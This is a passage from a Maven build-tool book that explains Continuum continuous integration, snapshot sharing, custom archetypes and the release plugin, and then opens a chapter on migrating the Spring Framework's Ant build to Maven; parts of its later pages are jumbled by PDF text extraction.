      <url>.../reference/${project.version}</url>
    </site>
  </distributionManagement>
  ...

Once these settings have been edited to reflect your setup, commit the file with the following command:

  C:\mvnbook\proficio> svn ci -m 'my settings' pom.xml

You should build all of these modules to ensure everything is in order, with the following command:

  C:\mvnbook\proficio> mvn install
You are now ready to start using Continuum. If you return to http://localhost:8080/continuum/, you will initially see an empty project list. Before you can add a project to the list, or perform other tasks, you must either log in with the administrator account you created during installation, or with another account you have since created with appropriate permissions. The login link is at the top-left of the screen, under the Continuum logo.

Once you have logged in, you can select Maven 2.0+ Project from the Add Project menu. This will present the screen shown in figure 7-2.

Figure 7-2: Add project screen shot

You have two options: you can provide the URL for a POM, or upload one from your local drive. While uploading is a convenient way to configure from your existing check out, in Continuum 1.0.3 this does not work when the POM contains modules, as in the Proficio example. Instead, you will enter either a HTTP URL to a POM in the repository – from a ViewCVS installation or a Subversion HTTP server, for example, when you set up your own system later – or, for this example, the file:// URL of the POM in the repository, as shown.

After submitting the URL, Continuum will return to the project summary page, and each of the modules will be added to the list of projects. Initially, the builds will be marked as New and their checkouts will be queued. This is all that is required to add a Maven 2 project to Continuum. The result is shown in figure 7-3.
Figure 7-3: Summary page after projects have built

Continuum will now build the project hourly, and send an e-mail notification if there are any problems. In addition, you can press Build Now on the Continuum web interface, next to a project, to trigger a build immediately.

If you want to put this to the test, go to your earlier checkout and introduce an error into Proficio.java – for example, remove the interface keyword:

  [...]
  public Proficio
  [...]

Next, check the file in:

  C:\mvnbook\proficio\proficio-api> svn ci -m 'introduce error' \
      src/main/java/com/mergere/mvnbook/proficio/Proficio.java

Now, press Build Now on the Continuum web interface next to the Proficio API module. The build will show an "In progress" status, and then fail, marking the left column with an "!" to indicate a failed build (you will need to refresh the page using the Show Projects link in the navigation to see these changes). You should also receive an e-mail at the address you configured earlier. The Build History link can be used to identify the failed build and to obtain a full output log.

To avoid receiving this error every hour, restore the file above to its previous state and commit it again. The build in Continuum will return to the successful state.

This chapter will not discuss all of the features available in Continuum, but you may wish to go ahead and try them. For example, you might want to set up a notification to your favorite instant messenger – IRC, Jabber, MSN and Google Talk are all supported.
Regardless of which continuous integration server you use, there are a few tips for getting the most out of the system:
• Commit early, commit often. Continuous integration is most effective when developers commit regularly. This doesn't mean committing incomplete code, but rather keeping changes small and well tested.
• Run builds as often as possible. This will make it much easier to detect the source of an error when the build does break. The frequency will be constrained by the length of the build and the available resources on the build machine, but it is best to detect a failure as soon as possible; Continuum can be configured to trigger a build whenever a commit occurs, if the source control repository supports post-commit hooks.
• Fix builds as soon as possible. While this seems obvious, it is often ignored. When a failure occurs in the continuous integration environment, it is important that it can be isolated to the change that caused it, and fixed before the developer moves on or loses focus. Continuous integration will be pointless if developers repetitively ignore or delete broken build notifications, and your team will become desensitized to the notifications in the future.
• Run clean builds. While rapid, iterative builds are helpful in some situations, it is also important that failures don't occur due to old build state; consider a regular, clean build. Continuum currently defaults to doing a clean build, and a future version will allow developers to request a fresh checkout.
• Run comprehensive tests. Continuous integration is most beneficial when tests are validating that the code is working as it always has, not just that the project still compiles after one or more changes occur. This also means that builds should be fast – long integration and performance tests should be reserved for periodic builds.
• Establish a stable environment. Avoid customizing the JDK or local settings, if they aren't something already in use in other development, test and production environments. In some cases, it is beneficial to test against all different versions of the JDK, operating system and other variables; Continuum has preliminary support for system profiles and distributed testing, with enhancements planned for future versions.
• Build all of a project's active branches. If multiple branches are in development, the continuous integration environment should be set up for all of the active branches.
• Run a copy of the application continuously. If the application is a web application, for example, run a servlet container to which the application can be deployed periodically from the continuous integration environment. This can be helpful for non-developers who need visibility into the state of the application, separate from QA and production releases.

In addition to the above best practices, there are two additional topics that deserve special attention: automated updates to the developer web site, and profile usage.

In Chapter 6, you learned how to create an effective site containing project information and reports about the project's health and vitality. For these reports to be of value, they need to be kept up-to-date. This is another way continuous integration can help with project collaboration and communication. Though it would be overkill to regenerate the site on every commit, it is recommended that a separate, but regular, schedule is established for site generation.
Verify that you are still logged into your Continuum instance, then select Schedules from the Administration menu on the left-hand side. You will see that currently, only the default schedule is available. Click the Add button to add a new schedule, which will be configured to run every hour during business hours (8am – 4pm weekdays). The appropriate configuration is shown in figure 7-4.

Figure 7-4: Schedule configuration

The schedule uses a Quartz cron expression; for the full syntax, refer to http://www.opensymphony.com/quartz/api/org/quartz/CronTrigger.html. The example above runs at 8:00:00, 9:00:00, and so on, through 16:00:00, from Monday to Friday. The "quiet period" is a setting that delays the build if there has been a commit in the defined number of seconds prior. This is useful when using CVS, since commits are not atomic and a developer might be committing midway through an update; it is not typically needed if using Subversion.
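A Quartz expression matching this description – on the hour, from 8am through 4pm, Monday to Friday – would look like the following sketch; the exact value entered in your own schedule may differ:

  0 0 8-16 ? * MON-FRI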
Once you add this schedule, return to the project list, and select the top-most project, Maven Proficio. The project information shows just one build definition, on the default schedule, that installs the parent POM but does not recurse into the modules (the -N or --non-recursive argument).

In this example you will add a new build definition to run the site deployment for the entirety of the multi-module build, on the business hours schedule. Since this is the root of the multi-module build – and it will also detect changes to any of the modules – this is the best place from which to build the site. In addition to building the sites for each module, it can aggregate changes into the top-level site as required. The downside to this approach is that Continuum will build any unchanged modules as well; if this is a concern, use the non-recursive mode instead, and add the same build definition to all of the modules. In Continuum 1.0.3, there is no way to make bulk changes to build definitions, so you would need to add that definition to each module individually.

To add a new build definition, click the Add button below the default build definition. The Add Build Definition screen is shown in figure 7-5.

Figure 7-5: Adding a build definition for site deployment

To complete the Add Build Definition screen, use the following values:
• POM filename: pom.xml
• Goals: clean site-deploy
• Arguments: --batch-mode -DenableCiProfile=true

The goals to run are clean and site-deploy. The site will be deployed to the file system location you specified in the POM, and will be visible from the repository Web server set up earlier in this chapter.
You can see also that the schedule is set to use the site generation schedule created earlier, and that it is not the default build definition, which means that Build Now from the project summary page will not trigger this build. However, each build definition on the project information page (to which you would have been returned after adding the build definition) has its own Build Now icon. Click this for the site generation build definition, then view the generated site once it completes.

The arguments provided are --batch-mode, which is essential for all builds to ensure they don't block for user input, and -DenableCiProfile=true, which sets the given system property. The meaning of this system property will be explained shortly.

In Chapter 6, a number of plugins were set up to fail the build if certain project health checks failed, such as the percentage of code covered in the unit tests dropping below a certain value. However, these checks delayed the build for all developers. If you compare the example proficio/pom.xml file in your Subversion checkout to that used in Chapter 6, you'll see that these checks have now been moved to a profile. Profiles are a means for selectively enabling portions of the build; if you haven't previously encountered them, please refer to Chapter 3. In this particular case, the profile is enabled only when the enableCiProfile system property is set to true:

  ...
  <profiles>
    <profile>
      <id>ciProfile</id>
      <activation>
        <property>
          <name>enableCiProfile</name>
          <value>true</value>
        </property>
      </activation>
      <plugins>
        <plugin>
          <groupId>org.apache.maven.plugins</groupId>
          <artifactId>maven-pmd-plugin</artifactId>
          <executions>
            ...

You'll find that when you run the build from the command line without this property (as Continuum did originally), none of the checks added in the previous chapter are executed; the checks will be run only when you enable the ciProfile using mvn -DenableCiProfile=true.

It is rare that the site build itself will fail, since most reports continue under failure conditions. However, if you want to fail the build based on these checks as well – so that if the build fails because of a failed check, the generated site can be used as a reference for what caused the failure – you can add the test, verify or integration-test goal to the list of goals. Any of these test goals should be listed after the site-deploy goal.
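To exercise the same checks from your own machine, enable the profile on the command line; install is used here simply as an example goal:

  C:\mvnbook\proficio> mvn clean install -DenableCiProfile=true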
There are two ways to ensure that all of the builds added in Continuum use this profile. The first is to adjust the default build definition for each module, by going to the module information page and clicking Edit next to the default build definition; however, at least in the version of Continuum current at the time of writing, it is necessary to do this for each module individually. The other alternative is to set this profile globally, for all projects in Continuum. As Maven 2 is still executed as normal, it reads the ${user.home}/.m2/settings.xml file for the user under which it is running, as well as the settings in the Maven installation. To enable this profile by default from these settings, add the following configuration to the settings.xml file in <maven home>/conf/settings.xml:

  ...
  <activeProfiles>
    ...
    <activeProfile>ciProfile</activeProfile>
  </activeProfiles>
  ...

In this case, it is the identifier of the profile itself, rather than the property used to enable it, that indicates the profile is always active when these settings are read.

How you configure your continuous integration depends on the culture of your development team and other environmental factors, such as the size of your projects and the time it takes to build and test them. The approach above is a reasonable default, but the timing and configuration can be changed depending upon your circumstances; for example, if the additional checks take too much time for frequent continuous integration builds, the verify goal may be better added only to the site deployment build definition, or the checks may be scheduled separately for the entire multi-module project after the site has been generated. The guidelines discussed in this chapter will help point your team in the right direction.

7.6. Team Dependency Management Using Snapshots

Chapter 3 of this book discussed how to manage your dependencies in a multi-module build. While dependency management is fundamental to any Maven build, in an environment where a number of modules are undergoing concurrent development, and where projects are closely related, the team dynamic makes it critical.

So far in this book, snapshots have been used to refer to the development version of an individual module. Projects in Maven stay in the snapshot state until they are released, which is discussed in section 7.8 of this chapter. In this section, you will learn about using snapshots more effectively in a team environment, and how to enable this within your continuous integration environment.

Snapshots were designed to be used in a team environment as a means for sharing development versions of artifacts that have already been built. The generated artifacts of a snapshot are stored in the local repository, and in contrast to regular dependencies, these artifacts will be updated frequently. Usually, when related modules depend on one another, the build involves checking out all of the dependent projects and building them yourself.
Instead of requiring every developer to build each related module from source, a team can use binary snapshots that have already been built and tested. While building all of the modules from source can work well, and is handled by Maven inherently, it doesn't fit well with an environment that promotes continuous integration, and it can lead to a number of problems – not least that it relies on manual updates from developers, which can be error-prone.

In Maven, sharing development versions is instead achieved by regularly deploying snapshots to a shared repository, such as the internal repository set up in section 7.3. Considering that example, you'll see that the deployment repository was defined in proficio/pom.xml:

  ...
  <distributionManagement>
    <repository>
      <id>internal</id>
      <url>file://localhost/C:/mvnbook/repository/internal</url>
    </repository>
    ...
  </distributionManagement>

Now, deploy proficio-api to the repository with the following command:

  C:\mvnbook\proficio\proficio-api> mvn deploy

You'll see that it is treated differently than when it was installed in the local repository: instead of 1.0-SNAPSHOT, the version used is the time that it was deployed (in the UTC timezone) and a build number, so the filename is similar to proficio-api-1.0-20060211.131114-1.jar. If you were to deploy again, the time stamp would change and the build number would increment to 2.

This technique allows you to continue using the latest version by declaring a dependency on 1.0-SNAPSHOT, or to lock down a stable version by declaring the dependency version to be the specific equivalent, such as 1.0-20060211.131114-1. While this is not usually necessary, locking the version in this way may be important if there are recent changes to the repository that need to be ignored temporarily.

Currently, the Proficio project itself is not looking in the internal repository for dependencies, though it may have been configured as part of your settings files. To add the internal repository to the list of repositories used by Proficio regardless of settings, add the following to proficio/pom.xml:

  ...
  <repositories>
    <repository>
      <id>internal</id>
      <url>http://localhost:8081/internal/</url>
    </repository>
  </repositories>
  ...
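Before rebuilding, it is worth seeing what the two styles of dependency declaration described above would look like; the groupId shown is assumed from the package naming used elsewhere in this chapter:

  <dependency>
    <groupId>com.mergere.mvnbook.proficio</groupId>
    <artifactId>proficio-api</artifactId>
    <!-- track the latest deployed snapshot -->
    <version>1.0-SNAPSHOT</version>
  </dependency>

  <dependency>
    <groupId>com.mergere.mvnbook.proficio</groupId>
    <artifactId>proficio-api</artifactId>
    <!-- lock to the specific timestamped build deployed above -->
    <version>1.0-20060211.131114-1</version>
  </dependency>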
Now, build proficio-core with the following command:

  C:\mvnbook\proficio\proficio-core> mvn -U install

During the build, you will see that some of the dependencies are checked for updates, with output similar to the example below (note that this output has been abbreviated):

  ...
  proficio-api:1.0-SNAPSHOT: checking for updates from internal
  ...

The -U argument in the prior command is required to force Maven to update all of the snapshots in the build, so that the updated version is downloaded. Whenever you use the -U argument, it updates both releases and snapshots; this causes many plugins to be checked for updates, as well as updating any version ranges. If it were omitted, no update would be performed, because the default policy is to update snapshots daily – that is, to check for an update the first time that particular dependency is used after midnight local time. You can always force the update using the -U argument, but you can also change the interval by changing the repository configuration. To do so, add the following configuration to the repository you defined above in proficio/pom.xml:

  ...
  <repository>
    ...
    <snapshots>
      <updatePolicy>interval:60</updatePolicy>
    </snapshots>
  </repository>
  ...

With this setting, any snapshot dependencies will be checked once an hour to determine if there are updates in the remote repository. The settings that can be used for the update policy are never, daily (the default), always, and interval:minutes. If you are developing plugins, you may also want to add this as a pluginRepository element as well.

This technique can ensure that developers get regular updates, without having to manually intervene, and without slowing down the build by checking on every access (as would be the case if the policy were set to always). However, the updates will still occur only as frequently as new versions are deployed to the repository. It is possible to establish a policy where developers do an update from the source control management (SCM) system, build and test, and then deploy the snapshot to share with the other team members before committing. However, this introduces a risk that the snapshot will not be deployed at all, deployed with uncommitted code, or deployed without all the updates from the SCM. Several of the problems mentioned earlier still exist – so at this point, assuming that the other developers have remembered to follow the process, all that is being saved is some time.
A much better way to use snapshots is to automate their creation. Since the continuous integration server regularly rebuilds the code from a known state, it makes sense to have it build snapshots, as well. How you implement this will depend on the continuous integration server that you use. Continuum can be configured to deploy its builds to a Maven snapshot repository automatically, if there is a repository configured to which to deploy them. As of Continuum 1.0.3, this feature is enabled by default in a build definition; however, so far in this section you have not been asked to apply the corresponding server setting, so let's go ahead and do it now.

Log in as an administrator and go to the Configuration screen, shown in figure 7-6.

Figure 7-6: Continuum configuration

To complete the Continuum configuration page, use the following values:
• Working Directory: C:\mvnbook\continuum-1.0.3\bin\win32\..\..\apps\continuum\working-directory
• Build Output Directory: C:\mvnbook\continuum-1.0.3\bin\win32\..\..\apps\continuum\build-output-directory
• Deployment Repository Directory: C:\mvnbook\repository\internal
• Base URL: the http://localhost:8080/continuum address used earlier
• Company Name: Mergere
• Company Logo: www.mergere.com/_design/images/mergere_logo.gif
• Company URL: www.mergere.com
The Deployment Repository Directory field entry relies on your internal repository and Continuum server being in the same location. If this is not the case, you can enter a full repository URL instead, such as scp://repositoryhost/www/repository/internal.

To try this feature, follow the Show Projects link, and click Build Now on the Proficio API project. Once the build completes, return to your console and build proficio-core again using the following command:

  C:\mvnbook\proficio\proficio-core> mvn -U install

You'll notice that a new version of proficio-api is downloaded, with an updated time stamp and build number. With this setup, you can avoid all of the problems discussed previously: you get regular updates from published binary dependencies, while retaining the option, when necessary, to either lock a dependency to a particular build or build from source.

Another point to note about snapshots is that it is possible to store them in a separate repository from the rest of your released artifacts. This can be useful if you need to clean up snapshots on a regular interval, but still keep a full archive of releases. If you are using the regular deployment mechanism (instead of using Continuum), this separation is achieved by adding an additional repository to the distributionManagement section of your POM. For example, if you had a snapshot-only repository in /www/repository/snapshots, you would add the following:

  ...
  <distributionManagement>
    ...
    <snapshotRepository>
      <id>internal.snapshots</id>
      <url>...</url>
    </snapshotRepository>
  </distributionManagement>
  ...

This will deploy to that repository whenever the version contains SNAPSHOT, and deploy to the regular repository you listed earlier when it doesn't.
Given this configuration, you can also make the snapshot update process more efficient by not checking the repository that contains only releases for snapshot updates. The replacement repository declarations in your POM would look like this:

  ...
  <repositories>
    <repository>
      <id>internal</id>
      <url>http://localhost:8081/internal/</url>
      <snapshots>
        <enabled>false</enabled>
      </snapshots>
    </repository>
    <repository>
      <id>internal.snapshots</id>
      <url>...</url>
      <snapshots>
        <updatePolicy>interval:60</updatePolicy>
      </snapshots>
    </repository>
  </repositories>
  ...

7.7. Creating a Standard Project Archetype

Throughout this book, you have seen the archetypes that were introduced in Chapter 2 used to quickly lay down a project structure. As you saw in this chapter, the requirement of achieving consistency is a key issue facing teams. Beyond the convenience of laying out a project structure instantly, archetypes give you the opportunity to start a project in the right way – that is, in a way that is consistent with other projects in your environment. While the standard archetypes are convenient, there is always some additional configuration required, either in adding or removing content from that generated by the archetypes, by hand. To avoid this, you can create one or more of your own archetypes.

There are two ways to create an archetype: one based on an existing project, using mvn archetype:create-from-project, and the other written by hand. Writing an archetype is quite like writing your own project; in this example it is written by hand, using the maven-archetype-archetype archetype to lay out its structure. To get started, run the following command:

  C:\mvnbook\proficio> mvn archetype:create \
      -DgroupId=com.mergere.mvnbook \
      -DartifactId=proficio-archetype \
      -DarchetypeArtifactId=maven-archetype-archetype
The layout of the resulting archetype is shown in figure 7-7.

Figure 7-7: Archetype directory layout

If you look at pom.xml at the top level, you'll see that the archetype is just a normal JAR project – there is no special build configuration required. The JAR that is built is composed only of resources, so everything else is contained under src/main/resources. There are two pieces of information required: the archetype descriptor in META-INF/maven/archetype.xml, and the template project in archetype-resources.

The archetype descriptor describes how to construct a new project from the archetype-resources provided. The example descriptor looks like the following:

  <archetype>
    <id>proficio-archetype</id>
    <sources>
      <source>src/main/java/App.java</source>
    </sources>
    <testSources>
      <source>src/test/java/AppTest.java</source>
    </testSources>
  </archetype>

Each tag is a list of files to process and generate in the created project. The example above shows the sources and test sources, but it is also possible to specify files for resources, testResources, and siteResources.
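As a sketch of one of the listed template files, src/main/resources/archetype-resources/src/main/java/App.java might contain something like the following; the class body is purely illustrative, while the $package reference is what places the generated class in the package chosen by the user:

  package $package;

  /**
   * A starting point generated by the archetype.
   */
  public class App
  {
      public static void main( String[] args )
      {
          System.out.println( "Hello from the generated project!" );
      }
  }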
The files within the archetype-resources section are Velocity templates. For example, the pom.xml file looks like the following:

  <project xmlns="http://maven.apache.org/POM/4.0.0"
           xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
           xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
                               http://maven.apache.org/maven-v4_0_0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>$groupId</groupId>
    <artifactId>$artifactId</artifactId>
    <version>$version</version>
    <dependencies>
      <dependency>
        <groupId>junit</groupId>
        <artifactId>junit</artifactId>
        <version>3.8.1</version>
        <scope>test</scope>
      </dependency>
    </dependencies>
  </project>

As you can see, the groupId, artifactId and version elements are variables that will be substituted with the values provided by the developer running archetype:create. These files will be used to generate the template files when the archetype is run.

From here, you need to populate the template with the content that you'd like to have applied consistently to new projects. Once you have completed the content in the archetype, Maven will build, install and deploy it like any other JAR. Since the archetype inherits the Proficio parent, it has the correct deployment settings already – in this example, the "internal" repository – so you can run the following command:

  C:\mvnbook\proficio\proficio-archetype> mvn deploy

The archetype is now ready to be used. To do so, go to an empty directory and run the following command:

  C:\mvnbook> mvn archetype:create -DgroupId=com.mergere.mvnbook \
      -DartifactId=proficio-example \
      -DarchetypeGroupId=com.mergere.mvnbook \
      -DarchetypeArtifactId=proficio-archetype \
      -DarchetypeVersion=1.0-SNAPSHOT

Normally, the archetypeVersion argument is not required; if omitted, a previous release would be used instead. It is needed here because the archetype has not yet been released (releasing a project is explained in section 7.8 of this chapter).

You now have the template project laid out in the proficio-example directory. It will look very similar to the content of the archetype-resources directory you created earlier; now, however, the content of the files is populated with the values that you provided on the command line. For more information on creating an archetype, refer to the documentation on the Maven web site.
7.8. Cutting a Release

Releasing software is difficult. It is usually tedious and error prone, full of manual steps that need to be completed in a particular order, which often leads to omissions or short cuts. Worse, it happens at the end of a long period of development, when everyone on the team just wants to get it out there. Finally, once a release has been made, it is usually difficult or impossible to correct mistakes other than to make another, new release.

Maven provides a release plugin that covers the basic functions of a standard release process. Once the definition for a release has been set by a team, releases should be consistent every time they are built, allowing them to be highly automated.5 The release plugin takes care of a number of manual steps: updating the project POM, updating the source control management system to check and commit release-related changes, creating tags (or the equivalent for your SCM), and performing standard tasks such as deployment to the remote repository.

The release plugin operates in two steps: prepare and perform. The prepare step is run once for a release, and does all of the project and source control manipulation that results in a tagged version. The perform step could potentially be run multiple times to rebuild a release from a clean checkout of the tagged version.

To demonstrate how the release plugin works, the Proficio example will be revisited, and released as 1.0. You can continue using the code that you have been working on in the previous sections, or check out the following:

C:\mvnbook> svn co \ \ proficio

To start the release process, run the following command:

c:\mvnbook\proficio> mvn release:prepare -DdryRun=true

This simulates a normal release preparation, without making any modifications to your project. As the command runs, you will be prompted for values. Accept the defaults in this instance (note that running Maven in "batch mode" avoids these prompts and will accept all of the defaults). You'll notice that each of the modules in the project is considered.

5 Mergere Maestro provides an automated feature for performing releases. Maestro is an Apache License 2.0 distribution based on a pre-integrated Maven, Continuum and Archiva build platform. For more information on Maestro, please see the Mergere web site.
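For a fully non-interactive run (on a continuous integration server, for instance), the same dry run can be executed in batch mode so that all of the defaults are accepted automatically; this is the batch mode referred to above:

C:\mvnbook\proficio> mvn -B release:prepare -DdryRun=true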
the explicit version of plugins and dependencies that were used are added any settings from settings. to verify they are correct. This is because the prepare step is attempting to guarantee that the build will be reproducible in the future. 4. This can be corrected by adding the plugin definition to your POM.tag file written out to each module directory. However. In this POM. as they will be committed to the tag Run mvn clean integration-test to verify that the project will successfully build Describe other preparation goals (none are configured by default. a number of changes are made: • • • 1. including profiles from settings. or that different profiles will be applied. an error will appear.next respectively in each module directory. This contains a resolved version of the POM that Maven will use to build from if it exists. You'll notice that the version is updated in both of these files. even if the plugin is not declared in the POM. For that reason. there is also a release-pom. or part of the project. or obtained from the development repository of the Maven project) that is implied through the build life cycle. 5. not ready to be used as a part of a release. and is set based on the values for which you were prompted during the release process.xml. 6. these changes are not enough to guarantee a reproducible build – it is still possible that the plugin versions will vary. but this might include updating the metadata in your issue tracker. or creating and committing an announcement file) 8. and setting the version to the latest release (But only after verifying that your project builds correctly with that version!). if you are using a dependency that is a snapshot. all of the dependencies being used are releases. the appropriate SCM settings) Check if there are any local modifications Check for snapshots in dependency tree Check for snapshots of plugins in the build Modify all POM files in the build. and snapshots are a transient build.xml 237 . The prepare step ensures that there are no snapshots in the build. Describe the SCM commit and tag operations 9. 2. and this is reverted in the next POM. This is because you are using a locally installed snapshot of a plugin (either built yourself. To review the steps taken in this release process: Check for correct version of the plugin and POM (for example. In some cases. other than those that will be released as part of the process (that is. any active profiles are explicitly activated. named pom. However.Team Collaboration with Maven In this project.xml (both per-user and per-installation) are incorporated into the POM. you may encounter a plugin snapshot.xml.tag and pom. Describe the SCM commit operation You might like to review the POM files that are created for steps 5 and 9. as they will be committed for the next development iteration 10. 3.xml and profiles. that resulting version ranges will be different. Modify all POM files in the build. other modules).xml. 7. The SCM information is also updated in the tag POM to reflect where it will reside once it is tagged.
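As a sketch of the correction described above, you would pin the offending plugin to a released version in your POM. The plugin and version shown here are only placeholders for whatever the error message names, and you should verify that your project still builds with that version:

<build>
  <plugins>
    <plugin>
      <groupId>org.apache.maven.plugins</groupId>
      <artifactId>maven-assembly-plugin</artifactId>
      <version>2.1</version>
    </plugin>
  </plugins>
</build>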
Recall from Chapter 6 that you learned how to configure a number of checks – so it is important to verify that they hold as part of the release. the release still hasn't been generated yet – for that. Also. while locally.xml in the same directory as pom.5. you need to enable this profile during the verification step. use the following plugin configuration: [.apache. However. To include these checks as part of the release process. This is used by Maven.properties file that was created at the end of the last run.] <plugin> <groupId>org. this file will be release-pom. If you need to start from the beginning. Having run through this process you may have noticed that only the unit and integration tests were run as part of the test build. you can remove that file. you'll see in your SCM the new tag for the project (with the modified files). instead of the normal POM. Once this is complete.1-SNAPSHOT. This is not the case however. the version is now 1. and the updated POM files are committed.. the release plugin will resume a previous attempt by reading the release. as these can be established from the other settings already populated in the POM in a reproducible fashion.. when a build is run from this tag to ensure it matches the same circumstances as the release build. This is achieved with the release:perform goal.] Try the dry run again: C:\mvnbook\proficio> mvn release:prepare -DdryRun=true Now that you've gone through the test run and are happy with the results. or run mvn -Dresume=false release:prepare instead. To do so. When the final run is executed. you can go for the real thing with the following command: C:\mvnbook\proficio> mvn release:prepare You'll notice that this time the operations on the SCM are actually performed.. you need to deploy the build artifacts.xml. You won't be prompted for values as you were the first time – since by the default..maven. This is run as follows: C:\mvnbook\proficio> mvn release:perform 238 .Better Builds with Maven You may have expected that inheritance would have been resolved by incorporating any parent elements that are used. recall that in section 7. or that expressions would have been resolved. you created a profile to enable those checks conditionally.plugins</groupId> <artifactId>maven-release-plugin</artifactId> <configuration> <arguments>-DenableCiProfile=true</arguments> </configuration> </plugin> [.
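For reference, the profile that -DenableCiProfile=true switches on can be keyed off that same property. The following is only a minimal sketch of the shape of such a profile; the profile id is arbitrary and the actual check plugins from section 7.5 are omitted:

<profiles>
  <profile>
    <id>enable-ci-checks</id>
    <activation>
      <property>
        <name>enableCiProfile</name>
        <value>true</value>
      </property>
    </activation>
    <build>
      <!-- plugin configuration for the additional checks goes here -->
    </build>
  </profile>
</profiles>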
check out the tag: C:\mvnbook> svn co \. the release plugin will confirm that the checked out project has the same release plugin configuration as those being used (with the exception of goals). before you run the release:prepare goal. It is important in these cases that you consider the settings you want. both the original pom. you want to avoid such problems. this requires that you remember to add the parameter every time.xml file.apache.xml file. add the following goals to the POM: [. and the built artifacts are deployed. you'll see that a clean checkout was obtained from the created tag. during the process you will have noticed that Javadoc and source JAR files were produced and deployed into the repository for all the Java projects. it is necessary to know what version ranges are allowed for a dependency. you can examine the files that are placed in the SCM repository. These are configured by default in the Maven POM as part of a profile that is activated when the release is performed.. When the release is performed..org/plugins/maven-release-plugin/ for more information. you would run the following: C:\mvnbook\proficio> mvn release:perform -DconnectionUrl=\ scm:svn: Collaboration with Maven No special arguments are required. To release from an older version. rather than the specific version used for the release. To do so. because the release.0 If you follow the output above. and to deploy a copy of the site.apache.maven.properties file had been removed.plugins</groupId> <artifactId>maven-release-plugin</artifactId> <configuration> <goals>deploy</goals> </configuration> </plugin> [.0 You'll notice that the contents of the POM match the pom.properties file still exists to tell the goal the version from which to release. To ensure reproducibility.] You may also want to configure the release plugin to activate particular profiles. For the same reason.. If this is not what you want to run. Refer to the plugin reference at. you can change the goals used with the goals parameter: C:\mvnbook\proficio> mvn release:perform -Dgoals="deploy" However. Also. Since the goal is for consistency. This is the default for the release plugin – to deploy all of the built artifacts. The reason for this is that the POM files in the repository are used as dependencies and the original information is more important than the release-time information – for example. before running Maven from that location with the goals deploy site-deploy. 239 . and not the release-pom.. or if the release.xml file and the release-pom. or to set certain properties.] <plugin> <groupId>org. though.xml files are included in the generated JAR file. To do this.
without having to declare and enable an additional profile.properties and any POM files generated as a result of the dry run.9. removing release. All of the features described in this chapter can be used by any development team... And all of these features build on the essentials demonstrated in chapters 1 and 2 that facilitate consistent builds. by making information about your projects visible and organized. define a profile with the identifier release-profile. real-time engineering style. Maven provides value by standardizing and automating the build process.maven. the only step left is to clean up after the plugin. as follows: [.Better Builds with Maven You can disable this profile by setting the useReleaseProfile parameter to false. and indeed this entire book.. The site and reports you've created can help a team communicate the status of a project and their work more effectively. 240 .] Instead. This in turn can lead to and facilitate best practices for developing in a community-oriented.apache. it can aid you in effectively using tools to achieve consistency in other areas of your development.Extra plugin configuration would be inserted here --> </build> </profile> </profiles> [.] After the release process is complete.. Simply run the following command to clean up: C:\mvnbook\proficio> mvn release:clean 7. the adoption of reusable plugins can capture and extend build knowledge throughout your entire organization. and while Maven focuses on delivering consistency in your build infrastructure through patterns.. To do this. Lack of consistency is the source of many problems when working in a team.. whether your team is large or small..plugins</groupId> <artifactId>maven-release-plugin</artifactId> <configuration> <useReleaseProfile>false</useReleaseProfile> </configuration> </plugin> [. as follows: [.] <plugin> <groupId>org.] <profiles> <profile> <id>release-profile</id> <build> <!-.. Maven was designed to address issues that directly affect teams of developers. Summary As you've seen throughout this chapter. you may want to include additional actions in the profile. So. There are also strong team-related benefits in the preceding chapters – for example. rather than creating silos of information around individual projects.
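As one hedged example of what might replace that placeholder comment (this is an illustration, not the book's configuration), the custom release-profile could attach a source JAR during the release build, similar to what the default profile does:

<profiles>
  <profile>
    <id>release-profile</id>
    <build>
      <plugins>
        <plugin>
          <groupId>org.apache.maven.plugins</groupId>
          <artifactId>maven-source-plugin</artifactId>
          <executions>
            <execution>
              <goals>
                <goal>jar</goal>
              </goals>
            </execution>
          </executions>
        </plugin>
      </plugins>
    </build>
  </profile>
</profiles>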
8. Migrating to Maven

This chapter explains how to migrate (convert) an existing build in Ant to a build in Maven:

• Splitting existing sources and resources into modular Maven projects
• Taking advantage of Maven's inheritance and multi-project capabilities
• Compiling, testing and building jars with Maven, using both Java 1.4 and Java 5
• Using Ant tasks from within Maven
• Using Maven with your current directory structure

This is your last chance. After this, there is no turning back. You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes.

- Morpheus, The Matrix
8.1. Introduction

The purpose of this chapter is to show a migration path from an existing build in Ant to Maven. This example will take you through the step-by-step process of migrating Spring to a modularized, component-based Maven build, while still running your existing, Ant-based build system. This will allow you to evaluate Maven's technology while enabling you to continue with your required work.

You will learn how to start building with Maven and, among other things, how to split your sources into modules or components, how to run Ant tasks from within Maven, and how to use an existing directory structure (though you will not be following the standard, recommended Maven directory structure). You will also be introduced to the concept of dependencies.

8.1.1. Introducing the Spring Framework

The Spring Framework is one of today's most popular Java frameworks. The Maven migration example is based on the Spring Framework build, which uses an Ant script. The Spring release is composed of several modules. For the purpose of this example, we will focus only on building version 2.0-m1 of Spring, which is the latest version at the time of writing.
Figure 8-1: Dependency relationship between Spring modules

In figure 8-1, you can see graphically the dependencies between the modules. Optional dependencies are indicated by dotted lines. Each of these modules corresponds, more or less, with the Java package structure, and each produces a JAR. These modules are built with an Ant script from the following source directories:

• src and test: contain the JDK 1.4 code, along with properties files, TLD files, etc.
• tiger/src and tiger/test: contain the JDK 1.5 code

For Spring, the Ant script compiles each of these different source directories and then creates a JAR for each module, using inclusions and exclusions that are based on the Java packages of each class. The src and tiger/src directories are compiled to the same destination, as are the test and tiger/test directories, resulting in JARs that contain both 1.4 and 1.5 classes.
8.2. Where to Begin?

With Maven, the rule of thumb is to produce one artifact (JAR, WAR, etc.) per Maven project file. In the Spring example, that means you will need to have a Maven project (a POM) for each of the modules listed above.

To start, you will create a subdirectory called 'm2' to keep all the necessary Maven changes clearly separated from the current build system. Inside the 'm2' directory, you will need to create a directory for each of Spring's modules.

Figure 8-2: A sample spring module directory
